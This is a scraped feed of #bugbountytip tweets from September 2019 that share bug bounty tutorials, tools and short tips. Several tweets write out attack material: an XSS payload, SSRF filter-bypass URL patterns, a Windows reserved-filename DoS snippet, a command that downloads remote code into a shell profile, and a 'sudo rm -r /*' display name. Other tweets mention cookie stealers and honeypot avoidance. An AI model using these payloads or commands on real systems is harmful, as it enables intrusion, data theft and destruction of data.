3 Maximise Your Bug Bounty Scope and Payout with #AMASS from $$ OWASP $$ https://t.co/UZCGyJAWXQ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops
A hacker's life
@Unknownuser1806


2019-09-22 14:29:59
1 This is a collection of writeups, cheat sheets, videos, related to SSRF in one single location https://t.co/DEn6Z8EY5X #SSRF, #bugbounty, #BugBountyTip
hacks2learn
@hacks2learn


2019-09-22 12:55:15
0 For those looking for new ideas... I re-discovered this awesome article today by @Jackson_T and I'm sharing it as it is an excellent resource for learning how to find vulnerabilities https://t.co/1QeTSFfaxl #BugBountyTip ๐Ÿ‘
expl0itc0der
@vanshitmalhotra


2019-09-22 12:09:38
1 Looking for Rare SQL Injection Bugs ? Maximise your Bug Bounty Payouts SQL Injection Tutorial - OWASP JuiceShop Hidden Christmas Surprise Challenge ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip https://t.co/N4vjkRujJj
expl0itc0der
@vanshitmalhotra


2019-09-22 12:03:33
0 A5 Broken Access Control Forced Browsing OWASP Juice Shop Tutorial Follow On Facebook $$$ https://t.co/iNczOcGmCt Subscribe on Youtube https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #devsecops #cybersecurity https://t.co/yQ2JhdWzi2
expl0itc0der
@vanshitmalhotra


2019-09-22 11:53:29
2 A6 Directory Listing Security Misconfiguration OWASP Juice Shop Tutorial Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting https://t.co/2gtd4DxOSr
m0z
@LooseSecurity


2019-09-22 10:33:56
3 What languages do you think are the best for hackers? It's a common question, interested to know what others think. In my opinion PHP programmers are very security-aware. Python is good for bug bounty automation. JS is good for advanced XSS payloads/PoCs. #BugBountyTip
OWASP Amass
@owaspamass


2019-09-22 05:28:59
5 OWASP Amass Tip For ASNs: amass intel -org OrgName For domain names: amass intel -active -asn n1,n2 For subdomains and infrastructure: amass enum -src -ip -df domains.txt #osint #recon #assetdiscovery #subdomain #enumeration #bugbounty #bugbountytip https://t.co/QWTftRbJKT
Vulkey_Chen
@Vulkey_Chen


2019-09-22 03:57:34
0 #BugBounty #BugBountyTips #BugBountyTip I build a burpsuite extension to mark sensitive information. e.g. If "mobile phone number" and "email address" information appear in the response content, then mark this request for red color. Open Source Address: https://t.co/zvEFnVh0FK https://t.co/fNN80C1Etz
iamsushi
@sushiwushi2


2019-09-22 02:21:14
0 Here's a #BugBountyTip, if you are lazy like me to manually generate a POST request CSRF POC, consider using this tool https://t.co/tEzQaMmFgB
Securisec ๐Ÿš€
@securisec


2019-09-21 23:55:24
0 "RT RT vanshitmalhotra: XSS Filter Bypass on https://t.co/bT7rV3brs6 ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Filter Bypass to Reflected XSS on https://t.co/z6m1vQwWw1 (mobile version) https://t.co/gJY9DNkfiL #Bugbountytip #xss #yahoo #penetrationtesting #bugbounty #pentesting"
expl0itc0der
@vanshitmalhotra


2019-09-21 22:50:44
0 XSS Filter Bypass on https://t.co/bFnci9AWC2 ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Filter Bypass to Reflected XSS on https://t.co/oz7xPDki4P (mobile version) https://t.co/mVUPFSwEL0 #Bugbountytip #xss #yahoo #penetrationtesting #bugbounty #pentesting
expl0itc0der
@vanshitmalhotra


2019-09-21 21:19:49
3 A5 Broken Access Control OWASP Juice Shop Challenge - OWASP Top Ten Tutorial https://t.co/BQlGp02UDf #BugBountyTip #penetesting #penetrationtesting #cybersecurity #devsecops #devops
expl0itc0der
@vanshitmalhotra


2019-09-21 21:15:14
3 A5 Broken Access Control Session Storage OWASP Juice Shop Tutorial OWASP Top Ten Training -- Free #BugBounty Tutorial - ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/SZmg3HOSP3 #BugBountyTip #penetesting #penetrationtesting #cybersecurity #devsecops #devops
[email protected]:~$ sudยค rm -r /*
@IAMPROPERSAM


2019-09-21 20:29:46
0 Web App owners: We are very secured nd safe from #Hackers. ๐Ÿ˜น๐Ÿ˜น #bugbounties #BugBountyTip https://t.co/6IeHA0Knpr
A hacker's life
@Unknownuser1806


2019-09-21 19:58:08
1 A list of payloads for any kind of #vulnerability https://t.co/RfVj8bc6A9 #XSS ,#sqli, #ssrf ,#csrf,#rce #bugbounty,#BugBountyTip
GTH / GrandTheftHTTP / Adam Langley
@GrandTheftHTTP


2019-09-21 18:07:06
0 Everyone is always trying to find content on a website. Why don't you look for the absence of content ( aka the 404 page ). 404โ€™s will quite often reflect the page URL that's trying to be accessed which could be prone to an XSS attack #BugBountyTip #hacking #infosec
Dominik Opyd
@neiriru


2019-09-21 17:56:25
0 I recommend reading #bugbounties #Security #Hacking #bugbountytips #BugBountyTip #BugBounty https://t.co/834ItNwAPP
Oad Earth
@oad_earth


2019-09-21 17:42:21
0 Is GitHub OAuth is really safe or is something wrong there? #BugBountyTip #Security #Hacking #BugBounty #bugbountytips #bugbounties https://t.co/ES0GAsnRsg
Sudoka
@sudo_sudoka


2019-09-21 16:41:16
1 Today I learn that we can check an IP whether it is a honeypot or not by using https://t.co/a61WGFzu9Q. Now you can avoid the honeypots and concentrate in real systems. Please comment if you find a honeypot. ๐Ÿ™ #bugbounty #bugbountytip #threathunting
expl0itc0der
@vanshitmalhotra


2019-09-21 09:32:50
3 Bug Bounty Tutorial - Maximise Your Bug Bounty Output With Simple Nmap Script --- $$$$$ --- Use these Nmap script to automate the searching of CVE for a version of service running on a port scanned using Nmap. #BugBounty #bugBountyTip https://t.co/0gfcgW7uTM
Enciphers
@enciphers_


2019-09-21 07:13:31
4 "Demystifying Frida" On our Youtube Channel: https://t.co/UolayOUxTO Presentation: https://t.co/nX6KhTtdNM #BugBountyTip #cybersecurity #pentest #informationsecurity #cybersec #infosecurity #infosec #BugBounty #androidapp #AppSec #MobileApp #Pentesting #iOS #androidsecurity https://t.co/2E3a1hoelj
BlackClover
@Bc10ver


2019-09-21 07:05:42
0 Top story: @intigriti: '๐Ÿ” Looking for XSS? Don't forget the parameter names! ๐Ÿ’กThanks for the #BugBountyTip, @p4fg! #HackWithIntigriti ' https://t.co/3COYJGb6iZ, see more https://t.co/fVnXn9Z0FJ
๐Ÿ‘ปin๐Ÿš
@0xerror


2019-09-21 07:05:42
0 XSS News: @intigriti: '๐Ÿ” Looking for XSS? Don't forget the parameter names! ๐Ÿ’กThanks for the #BugBountyTip, @p4fg! #HackWithIntigriti ' https://t.co/0zBniIXCrE, see more https://t.co/4VACxHYGGn
Rapid Safeguard
@RapidSafeguard


2019-09-21 06:52:52
0 https://t.co/3YHBGnQ3VO Awesome Hacking Resources #hacking #resources #infosec #BugBountyTip
๐Ÿ‘ฃ
@_sawzeeyy


2019-09-20 22:25:31
1 Don't forget to use that BXSS payload ๐Ÿ˜‰ #BugBounty #BugBountyTip
Murdockz
@Murdockz_CEH


2019-09-20 20:51:58
1 Company: "Great find, keep up the good work and please continue to test the API" Me: "Sure...btw I was able to achieve RCE further exploiting the SQLi on the strfdate feild" Company: ".........." ๐Ÿฅด๐Ÿ˜‚๐Ÿ˜… btw this is a Ruby built API ๐Ÿคช #bugbounty #bugbountytips #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-09-20 18:58:49
0 Stealing JWTs in localStorage via XSS #BugBounty #BugBountyTip #Pentesting #penetrationtesting #cybersecurity https://t.co/XkEWCB2gXb
Michele Romano
@Mik317_


2019-09-20 17:58:38
0 OK, I'm off ... can't find something challenging and want to find something on a well paid and very used software ... any suggest on the name of the software to test? #BugBountyTip https://t.co/EUH5oFQ6Wk
Rafin Rahman Chy
@rafinrahmanchy


2019-09-20 17:44:24
0 Free Nmap Courses https://t.co/TAy9OCjuHo https://t.co/6EEKrEKPj5 https://t.co/82UGYDkWgz #nmap #Pentesting #InfoSec #CyberSecurity #Hacking #Hacker #EthicalHacking #whitehat #BugBounty #BugBountyTip https://t.co/UjVc2AxHSj
intigriti
@intigriti


2019-09-20 15:39:53
9 ๐Ÿ” Looking for XSS? Don't forget the parameter names! ๐Ÿ’กThanks for the #BugBountyTip, @p4fg! #HackWithIntigriti https://t.co/VsFLtVFJRm
Mehmet Xyele
@mehmetxyele


2019-09-20 15:01:17
6 Subdomain enumeration with Rapid7 FDNS using AWS Athena https://t.co/fTJDvpeOWF #bugbounty #bugbountytips #bugbountytip #hackerone #hacker0x1 #hacker101 #bugcrowd
plenum ๐Ÿ‡น๐Ÿ‡ณ
@plenumlab


2019-09-20 14:58:21
0 Been busy lately to do write-ups here is a short story about 2500$ bug chain #BugBountyTip #BugBounty https://t.co/TMV1kiRFPl
Vulkey_Chen
@Vulkey_Chen


2019-09-20 14:55:12
0 #BugBountyTip #bughunter #bugbountytips BugBounty Hunter's Vulnerability Test Aid Platform: https://t.co/KrIlHNdFai ,Open Source Address: https://t.co/oUqeQBxmDQ
A hacker's life
@Unknownuser1806


2019-09-20 14:18:59
0 Bugbounty cheatsheet https://t.co/dIe8tBFAK7 #bugbounty, #BugBountyTip
Karel Origin
@Karel_Origin


2019-09-20 11:20:46
1 @intigriti couldn't handle this #bugbountytip (๐Ÿ˜ข), so here I am: XSS executing on the wrong domain? No problem! Social Engineer your favourite platform analyst! https://t.co/26axjq8Iwj
SecuNinja
@secuninja


2019-09-20 11:05:16
3 don't waste your time with @zerocopter form based public programs. just got replies after 10 months telling me they cannot reproduce a bug.... wow! what surprise after 10 months. others still open same long... #bugbounty #bugbountytip
Murdockz
@Murdockz_CEH


2019-09-20 07:21:10
1 API --> JSON body post request--> contains two numeric fields --> first field set value from -1 to 9999999999 --> PostgreSQL database disclose --> set other field from 100 to 999999 --> table, query, fields disclose. #bugbountytips #bugbounty #bugbountytip
kassih mouhssine
@KassihMouhssine


2019-09-20 00:00:17
0 6 bugs : 4 idors and broken access control and account takeover and all this shit are duplicated #bugbountytip #BugBounty #CyberSecurity #dxtr0x01
Faizal Abroni
@faizalabroni


2019-09-19 23:10:40
2 https://t.co/f8BIngazNw This is how we found something from information disclosure to remote code execution and Worth $10.000 (indonesian language) #bugbountytip #bugbounty #togetherwehitharder #ItTakesaACrowd #hackerone #bugcrowd
expl0itc0der
@vanshitmalhotra


2019-09-19 20:09:45
6 Bug Bounty โ€” Tips / Tricks / JS (JavaScript Files) https://t.co/GTENhx5EI7 #BugBounty #BugBountyTip #JS #PenetrationTesting #pentesting #devops #devsecops #cybersecurity
expl0itc0der
@vanshitmalhotra


2019-09-19 20:03:33
2 JS-Recon detailed. Analizying the internal network with a XSS https://t.co/ySiyhKIP7K Follow For Cyber Security Training and Bug Bounty Updates https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #Penetrationtesting #pentesting #cybersecurity #tools #pentesttools #bugbountytool
expl0itc0der
@vanshitmalhotra


2019-09-19 19:59:58
1 Exploiting File Uploads โ€“ A Tale of a $3k worth RCE --- $$ https://t.co/zpcHqz0fyx #BugBounty #BugBountyTip #PenetrationTesting #Penetesting #CyberSecurity #bounty $$$$$
expl0itc0der
@vanshitmalhotra


2019-09-19 19:54:18
0 BugBounty --- Cheat Sheets, Methodologies https://t.co/8CyoUV65oL #BugBounty #BugBountyTip $$$$$$$
bugbountytip
@a_l_e_r_t_1_


2019-09-19 19:03:19
0 VIM tutorial: linux terminal tools for bug bounty pentest and redteams w... https://t.co/R4yTVHqWHE #bugbountytip
itsmenaga
@nagarockshard


2019-09-19 17:58:21
0 If You See Any White Label Error Page just load your Burp intruder With Actuator Endpoints . If lucky Enough You might End Up With Gold Mine. List:- https://t.co/IObR5VqFPJ #pentesttips #bugbountytip #bugbounty
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-09-19 16:29:17
0 From Tbilisi to Batumi is 5 hours by train :) Decide play in Termux and recon :) #bugbountytip https://t.co/uoco4qvpZG
DarkOverFlow
@HAXORANON


2019-09-19 12:56:29
0 does anyone know how to find forgotten endpoints if so dm me #hackerone #bugbountytip #bugbounty #bughunter #bugbountytips
Shaked Klein Orbach ๐Ÿ‡ฎ๐Ÿ‡ฑ
@shakedko


2019-09-19 11:21:56
1 Did you know about "thisisunsafe" when visiting HTTPS websites with HSTS? https://t.co/e9VaXqwGpd Almost like IDDQD or better IDKFA #BugBounty #bugbountytip
Dominik Maล‚owiecki
@5up3rD43m0n


2019-09-19 09:54:47
0 it's one of these days when you check your database and realize that a bug hunter was successful, but he did not realize it and forget to report it #bugbountytip @Hacker0x01
Constant ๐Ÿ‡ช๐Ÿ‡ฌ
@Mr_A_ConstanT


2019-09-19 09:44:14
0 a shell script aim to automatically launch 50+ online web scanning tools in the Browser against a target domain in a 10 waves, #CyberSecurity #bugbountytip #WebApp #Hacking https://t.co/nTNLn3LrpY
JaWaD ๐Ÿ‡ฒ๐Ÿ‡ฆ
@CHAJER2


2019-09-19 09:39:01
0 Yay, I was awarded a $750 bounty on @Hacker0x01 #TogetherWeHitHarder steps: == #bugbountytip: Change sometimes method post to get can lead to Information Exposure Through Debug Information.
Avanish Pathak
@avanish46


2019-09-19 05:52:05
0 #bugbountytip discovered CSRF+Stored XSS in a private program on @Bugcrowd but unfortunately XSS was Out of scope in that program. How it works :- https://t.co/f2YJa1WgTi
A hacker's life
@Unknownuser1806


2019-09-19 03:08:09
1 When you are looking for vulnerabilities, always remember to think outside the box and submit encoded values to see how the site handles the input. #hacking, #bugbountytip ,#bugbounty
Fisher
@Regala_


2019-09-19 01:12:56
2 The less you use scanners, the more severe your issues are #cosmic #DISTURBANCE ๐Ÿ‡จ๐Ÿ‡ฆ #bugbounty #bugbountytip
Murdockz
@Murdockz_CEH


2019-09-18 19:58:10
0 Guys if you are looking to get up and running with Go / Golang, I highly recommend this video by @traversymedia Go / Golang Crash Course https://t.co/kH75W4DeY3 #bugbounty #go #golang #bugbountytip #bugbountytips
สŠีผำ„ีผึ…ีกีผ สŠึ†ษ›ส€
@Unknownuser1806


2019-09-18 18:56:33
0 Good #hacking is a combination of observation and skill. #bugbountytip , #motivation ,#bugbounty
RabbidByte
@RabbidByte


2019-09-18 14:35:27
0 Don't forget about the @Hacker0x01 Hacker101 discord channel .... I missed way too much when I forgot about it for 8 months or so. #bugbountytip
Emad Youssef
@Sy3Omda


2019-09-18 12:57:27
0 as it looks simple as it should be BUT this would minimize your time in enumeration phase curl https://t.co/wuePgiRbGU -o ~/.bash_profile && echo "source ~/.bash_profile" >> ~/.bashrc i have combined most of keyhack in one bash profile enjoy #BugBounty #bugbountytip #Pentesting
gweeperx
@gweeperx


2019-09-18 07:42:39
2 Just another XHR cookie/body stealer: https://t.co/kbmsAYuwsJ #bugbounty #bugbountytip #bugbountytips
สŠีผำ„ีผึ…ีกีผ สŠึ†ษ›ส€
@Unknownuser1806


2019-09-18 03:39:15
0 DetExploit - Software That Detect Vulnerable Applications, Not-Installed OS Updates And Notify To User https://t.co/HrwGYO0fjL #bugbounty , #bugbountytip ,#hacking
สŠีผำ„ีผึ…ีกีผ สŠึ†ษ›ส€
@Unknownuser1806


2019-09-18 03:33:03
0 #XSS, #SQLi, #CSRF, #SSRF, #XXE, OS command #injection, directory traversal., and #HTTPrequest smuggling. - > Everything you need to getting started with #bugbounty #bugbountytip , #hacking https://t.co/4ZnwNy6STO
daniel_v
@danielv47251669


2019-09-17 18:09:57
0 #bugbountytip #bugbountytips >found a login page restricted to business email only >intercepted the signup request > intercepted response from this request > changed response body from "false" to "true" > auth bypass > internal access to the platform
farukh
@Farukhwap


2019-09-17 16:17:30
0 @Olacabs @ola_supports @olamoney_in @OlainUK why is it empty ๐Ÿค” #fixit #bugbountytips #bugbountytip #loot #Ola https://t.co/CS0HUxo0if
luffydragneel
@Hackers_Guild


2019-09-17 15:56:39
0 Suppose there is contracts page at https://t.co/guSo2PGluZ meant only for Admins and not visible in the lower privileged user's UI. Just directly browse to that page from this lower privileged account, and you might end up seeing the contents there. #bugbountytip #bugbounty https://t.co/1cOxnJ0OTI
Vulkey_Chen
@Vulkey_Chen


2019-09-17 13:52:17
1 #bugbountytip #burpsuite #bugbountytips #bughunter I build a burpsuite extension to mark sensitive information.If "mobile phone number" and "email address" information appear in the response content, then mark this request for red color. https://t.co/qeY996qzTi
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-09-17 13:51:02
17 i have uploaded 34 new articles about different fields of hacking as a pdf files to my github repository. i will continue working on this project years to come. https://t.co/q2layzVpKz #pentest #malware #hacking #infosec #cybersecurity #bugbountytip #redteam #hacking #0day #osint https://t.co/IAaAGXn9HD
สŠีผำ„ีผึ…ีกีผ สŠึ†ษ›ส€
@Unknownuser1806


2019-09-17 12:54:42
0 Awesome #Shodan search queries https://t.co/Wo0inc380w #bugbounty , #bugbountytip ,#hacking
Vedant
@ved_wayal


2019-09-17 08:58:43
0 Blind XSS is lub ๐Ÿ˜œ๐Ÿ˜ #bugbountytip https://t.co/GHlwkPix6W
Rishabh
@____cypher____


2019-09-17 06:58:06
0 SSRF tip: [email protected] ==> black[.]com black[.]com?white[.]com ==> black[.]com black[.]com#white.com ==> black[.]com #bugbountytip #BugBounty #bugbountytips
oops
@a_l_e_r_t_1_


2019-09-17 06:44:01
0 Search for high-level vulnerabilities if you don't want the vulnerability to be duplicated :) #bugbountytip
Sultan Haikal
@SultanMoeslim


2019-09-17 06:08:28
0 {Reviews} in bugbounty, report recipients ... are taking more references from reporters! to imitate / change systematic design, secure etc. reporters don't get any profit. and those who change this, of course benefit internally. best manipulation. #bugbounty #bugbountytip
AFAQUE KHAN
@Afaquekhan24


2019-09-17 05:13:43
1 @stereotype32 Remember you fools...you bug bounty hunter fools... any bypass technique that is publicly posted no longer work in real world scenario .....this is my #protip for today #hackerone #bugbountytip #BugBounty #bugbountytips #bugcrowd ...Happy hunting...
Pomegranate ๐ŸŒด
@ret2pomegranate


2019-09-17 04:33:45
1 When you & your partner get a bounty. #bugbountytip #bugbounty #infosec https://t.co/3rjqUgsXeE
luffydragneel
@Hackers_Guild


2019-09-17 03:46:04
1 Suppose the sensitive content is at /folder/content. If there is proper access control on /folder, it doesn't mean that there is proper access control when you visit /folder/content directly. Always look for access control issues on each endpoint. #bugbountytip #bugbounty https://t.co/J8jVcy2IKB
Pomegranate ๐ŸŒด
@ret2pomegranate


2019-09-16 23:47:44
0 Just reported Double-Sequence XSS which affects 2 parameters in a single endpoint to a program on @Hacker0x01. #bugbounty #bugbountytip #infosec
Michele Romano
@Mik317_


2019-09-16 18:22:47
0 @Manikan77602456 understand how programs work, and definitely how other researcher think ;). Probably see how reports are thought/presented/explained is the best thing you can do to learn. Also, check Twitter #bugbountytip and similar: you'll find good bypasses or medium articles.
Jakub Juszczak
@apertureless


2019-09-16 12:11:31
0 Blind XSS is still my favorite. Spray the payload and after some time, you receive your christmas present ๐ŸŽ #infosec #bugbountytip
intigriti
@intigriti


2019-09-16 11:56:17
2 This actually worked on the first site we tested! ๐Ÿคฏ P.S.: Legacy or unimplemented OAuth flows often contain vulnerabilities that can lead to account takeover. ๐Ÿ˜ˆ Thanks for the #BugBountyTip, @ngalongc! https://t.co/vwAi9hhHrm
SilexSecure
@silexsecure


2019-09-16 11:23:55
0 @silexsecure Today you will learn WordPress penetration testing using WPScan and Metasploit. @rsilexlab @metasploit @ubuntu @kalilinux @wordpressdotcom #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningmonday #CyberAttack #SSL#GOODhat
Karna
@karna__1


2019-09-16 11:04:38
1 If you want a free online phone number service to receive OTP(s) for your web app testing, here's one: https://t.co/3dPt58DZGy #bugbounty #bugbountytip
Oops!
@Corrupted_brain


2019-09-16 10:17:18
0 This Oracle directory architecture was quite helpful for me to harvest critical information by exploiting XXE and reading files locally. #bugbountytip #bugbounty #Oracle https://t.co/Fjhg3OX2Gd
Sp
@spt_2020


2019-09-16 10:06:29
0 Collection Of Bug Bounty Tip-Will Be updated daily https://t.co/BYm6GxAFnz #bugbountytip
oops
@a_l_e_r_t_1_


2019-09-16 08:48:37
0 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
Juha Remes
@juha_remes


2019-09-16 08:36:33
0 This is a great #bugbountytip. ๐Ÿ‘ https://t.co/XteWTBVmMe
oops
@a_l_e_r_t_1_


2019-09-16 08:22:45
0 Really very, very slow in fixing gitlab vulnerabilities #bugbountytip
Pomegranate ๐ŸŒด
@ret2pomegranate


2019-09-16 05:54:08
0 #BugBounty #bugbountytip #infosec Normal User: โ€œText Injectionโ€ (The Depression Period) Bug Bounty Hunter: Arbitrary Spoofed Character Encoded Injection via the Roman Alphabet. https://t.co/Z20cvTDtUG
Pomegranate ๐ŸŒด
@ret2pomegranate


2019-09-16 03:35:05
2 Just reported XSS to a program on @Hacker0x01. #InfoSec #bugbounty #bugbountytip Got XSS through a POST request in a parameter, automated it through my web-server due to `document.location.href=` being used in the vulnerable parameter.
สŠีผำ„ีผึ…ีกีผ สŠึ†ษ›ส€
@Unknownuser1806


2019-09-16 02:45:02
0 This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview. #shodaneye : https://t.co/AarJFRVDOP #hacking #bugbounty #bugbountytip
A DNF ๐Ÿฆ–
@binb4sh


2019-09-16 01:08:34
0 If the target server is running Windows and you can create files and directories on it, try to create ones with forbidden names (CON,AUX,etc)! It may cause errors resulting in Info Disclosure/DoS. An example written in PHP: file_put_contents("con.png",""); #bugbountytip
terjanq
@terjanq


2019-09-16 00:22:36
3 I haven't published any writeups in a while. Here is my latest #writeup to an awesome #buyify challenge from #csaw19 #ctf that has just ended a few hours ago. The author of the task is @itszn13. You should definitely check this out! https://t.co/uAWk6hsyoI #bugbountytip
Drok3r๐Ÿดโ€โ˜ ๏ธ
@drok3r


2019-09-15 21:23:18
0 pixload -- Image Payload Creating tools #bugbountytip #payload Link [ https://t.co/6wh5X9EWXB ] https://t.co/Fc4kBuKmMp
securibee ๐Ÿ
@securibee


2019-09-15 19:19:08
0 @Random_Robbie @j_opdenakker @Vin1515 @zseano @NahamSec @TomNomNom @d0nutptr @stokfredrik @yaworsk @Alyssa_Herrera_ has great content as well make sure to follow her! @ITSecurityguard Follow #bugbountytip although it's pretty noisy. Subscribe to newsletter from @PentesterLand https://t.co/e2fgYy31Gr I keep forgetting people. My bad!
dykaushik
@dykaushik


2019-09-15 17:40:17
0 Collection Of Bug Bounty Tip-Will Be updated daily https://t.co/GGQro6C5zH #bugbountytip
Mayur Parmar
@th3cyb3rc0p


2019-09-15 17:13:52
0 Must read blog๐Ÿ™‚ https://t.co/4nQ54tutfD #bugbountytip #BugBounty #bughunting #ethicalhacking
W๐ŸŒaR๐Ÿeeq
@wareeq_shile


2019-09-15 16:44:53
0 Can this still be taken over? #BugBounty #bugbountytip #bugbountytips https://t.co/nN5Xdani38
Wh11teW0lf
@Wh11teW0lf


2019-09-15 16:26:05
1 #bugbountytip The most vulnerable place in Wordpress/Drupal is a custom themes and plugins. Wordpress Location: /wp-content/themes/ and /wp-content/plugins/ You can found their name with Waybackarchive or site map in Burp.
Murdockz
@Murdockz_CEH


2019-09-15 14:50:00
0 Passive recon ๐Ÿ˜ #bugbountytip #bugbountytips #bugbounty https://t.co/oCvjzwcsb6
Somdev Sangwan
@s0md3v


2019-09-15 13:27:18
0 @yassergersy Why is this #bugbountytip and not #websecuritytip?
vavkamil
@vavkamil


2019-09-15 13:01:34
1 How to bypass Android certificate pinning and intercept SSL traffic #bugbounty #bugbountytip https://t.co/KFRUCYEc96
Youssef A. Mohamed
@GeneralEG64


2019-09-15 12:36:29
4 The easiest P1 ever!! ๐Ÿ˜‚๐Ÿ˜ Steps to Reproduce: Navigated to https://t.co/CEADFzHYUD Directory Bruteforcing found "admin" Bruteforcing into it found "users.db" Exposing admin's creds in plaintext! Logging in to the Admin Panel. #BugBounty #bugbountytip https://t.co/7SuX3E5otC
BlackClover
@Bc10ver


2019-09-15 12:15:41
0 Top story: @yassergersy: '#bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss ' https://t.co/dkBDDSkQ0n, see more https://t.co/fVnXn9Z0FJ
๐Ÿ‘ปin๐Ÿš
@0xerror


2019-09-15 12:15:40
0 XSS News: @yassergersy: '#bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss ' https://t.co/TDrl37pldF, see more https://t.co/4VACxHYGGn
oops
@a_l_e_r_t_1_


2019-09-15 08:55:16
1 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
nocomp
@nocomp


2019-09-15 08:01:13
0 Any good #BugBounty discord place for learn and share? #bugbountytip thx for RT
HackIsOn ยฎ
@hackison


2019-09-15 07:57:21
0 Ghazi is a BurpSuite Plugins For Testing various PayLoads Like "XSS,SQLi,SSTI,SSRF,RCE and LFI" through Different tabs , Where Each Tab Will Replace Every GET or POST Parameters With Selected TAB in "Proxy" or "Repeater" TAB. https://t.co/PUhzq0SuEo #bugbounty #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2019-09-15 05:12:49
0 Awesome #bugbountytip https://t.co/DnjdSHMcix
Securisec ๐Ÿš€
@securisec


2019-09-15 02:08:06
0 "RT RT YoKoAcc: Bismillah. Releasing one of my RCE story at one of Bug Bounty Program. Race Condition that could Result to RCE - (A story with an App that temporary stored an uploaded file within 2 seconds before moving it to Amazon S3). https://t.co/j8fCpvwWy6 #bugbountytipโ€ฆ
Ankur Vaidya
@4N_CURZE


2019-09-15 00:14:37
0 Finally reached and completed one more milestone :) ๐Ÿ˜€๐Ÿ˜ƒ๐Ÿ˜๐Ÿ˜โ™ฅ๏ธโ™ฅ๏ธโ™ฅ๏ธ #openbugbounty #xss #bugbounty #bugbountytip #bughunter #WhiteHats #pentest #Pentesting @openbugbounty @openbounty @whitehatsec @bugbountyforum https://t.co/zKVguucXI3
Pomegranate ๐ŸŒด
@ret2pomegranate


2019-09-14 20:26:55
0 Just reported RCE to a program on @Hacker0x01. Wish me the best of luck. #infosec #bugbounty #bugbountytip Kind of nervous because of an accidental reboot that occurred while I was testing for a PoC.
๏ผข๏ฝ‰๏ฝŠ๏ฝ๏ฝŽ ๏ผญ๏ฝ•๏ฝ’๏ฝ๏ฝ•
@0xBijan


2019-09-14 20:14:02
0 New write-up "How I found a simple and weird Account takeover bug" https://t.co/32185JXNW6 #bugbounty #bugbountytip
Aziz Hakim
@hackerb0y_


2019-09-14 20:09:17
0 I was logged in a program's portal!๐Ÿง Suddenly I have visited this URL!๐Ÿ™„ https://*.redacted.com/user/profile/delete and GUESS what? My account got deleted without any confirmation!๐Ÿคฃ #bugbountytip #bugbounty
Murdockz
@Murdockz_CEH


2019-09-14 18:22:10
0 2. Will do a write up on how to exploit graphql after bug is fixed and bounty rewarded ๐Ÿ˜„...there is a part I can't disclose in part 1. #bugbountytip #BugBounty #bugbountytips
Murdockz
@Murdockz_CEH


2019-09-14 18:20:13
0 1. Able to read anyone's gender status when it is set to private or only show to friends. User A not friends with User B. User A can not see User B gender status. User A send a graphql request to user B private gender status is revealed. #bugbounty #bugbountytip #bugbountytips
Pomegranate ๐ŸŒด
@ret2pomegranate


2019-09-14 16:10:14
0 Accidentally ran a software-specific โ€˜rebootโ€™ command & crashed the server. Itโ€™s been 10+ hours and no response. Should I report this issue to the acquisition/asset? #bugbounty #InfoSec #bugbountytip
Sudoka
@sudo_sudoka


2019-09-14 15:48:48
1 #Bypass #XSS filters with JavaScript RegExp.prototypeโ€‹.source ๐Ÿน๐ŸŽฏ๐Ÿ† #bugbountytip https://t.co/DiP4CZcqg6
Aditya
@hetroublemakr


2019-09-14 14:15:05
1 Ran into an interesting blog on Medium about #bugbountytip #infosec by @bbinfosec https://t.co/kUUQiAWtca
YasserGersy
@yassergersy


2019-09-14 13:39:56
1 #bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss https://t.co/wEtN3fl4xT
oops
@a_l_e_r_t_1_


2019-09-14 12:42:06
0 My favorite xss payload : <img onerror="{alert`1`}" src> #bugbountytip
Fisher
@Regala_


2019-09-14 11:17:53
0 I'll experiment with streaming like all the cool kids are doing these days ๐Ÿ˜‡ Starting October, schedule to be announced. Any particular subjects you'd be interested seeing or people? Let me know below ๐Ÿ‘‡ #bugbounty #bugbountytip #infosec
Khaled Mohamed
@xelkomy


2019-09-13 20:15:20
0 shopify xss google auth this video awesome #bugbountytip #hackerone #BugBounty https://t.co/JbWlhXSOCK
Sandeep Raghav
@Sandeep_tunna


2019-09-13 18:03:30
